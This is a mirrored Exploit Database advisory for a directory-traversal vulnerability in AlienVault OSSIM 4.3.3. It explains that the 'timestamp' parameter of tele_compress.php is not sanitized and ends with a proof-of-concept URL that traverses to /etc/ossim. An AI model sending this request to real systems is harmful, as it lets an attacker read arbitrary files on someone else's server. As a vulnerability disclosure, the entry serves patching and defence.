Alienvault Open Source SIEM (OSSIM) – ‘Timestamp’ Directory Traversal

• Exploit Database
• 14 阅读

• 作者： Ding Yu-Chi
  日期： 2013-10-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38784/

• source: https://www.securityfocus.com/bid/62899/info
  
  Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
  
  Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
  
  Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected. 
  
  http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim